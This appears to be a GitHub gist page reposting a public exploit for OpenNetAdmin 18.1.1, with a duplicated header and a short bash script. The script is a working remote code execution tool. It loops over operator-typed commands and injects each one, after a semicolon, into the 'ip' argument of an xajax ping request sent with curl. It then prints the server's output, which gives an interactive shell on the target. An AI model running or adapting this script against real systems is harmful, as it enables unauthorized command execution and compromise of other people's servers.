Created
          February 25, 2020 00:13 
        
      - 
      
- 
        Save austinsonger/8b79aff8bfb047b5b00a4132df7c26a2 to your computer and use it in GitHub Desktop. 
    OpenNetAdmin 18.1.1 - Remote Code Execution
  
        
  
    
      This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
      Learn more about bidirectional Unicode characters
    
  
  
    
  | # Exploit Title: OpenNetAdmin 18.1.1 - Remote Code Execution | |
| # Date: 2019-11-19 | |
| # Exploit Author: mattpascoe | |
| # Vendor Homepage: http://opennetadmin.com/ | |
| # Software Link: https://github.com/opennetadmin/ona | |
| # Version: v18.1.1 | |
| # Tested on: Linux | |
| # Exploit Title: OpenNetAdmin v18.1.1 RCE | |
| # Date: 2019-11-19 | |
| # Exploit Author: mattpascoe | |
| # Vendor Homepage: http://opennetadmin.com/ | |
| # Software Link: https://github.com/opennetadmin/ona | |
| # Version: v18.1.1 | |
| # Tested on: Linux | |
| #!/bin/bash | |
| URL="${1}" | |
| while true;do | |
| echo -n "$ "; read cmd | |
| curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1 | |
| done | 
  
    Sign up for free
    to join this conversation on GitHub.
    Already have an account?
    Sign in to comment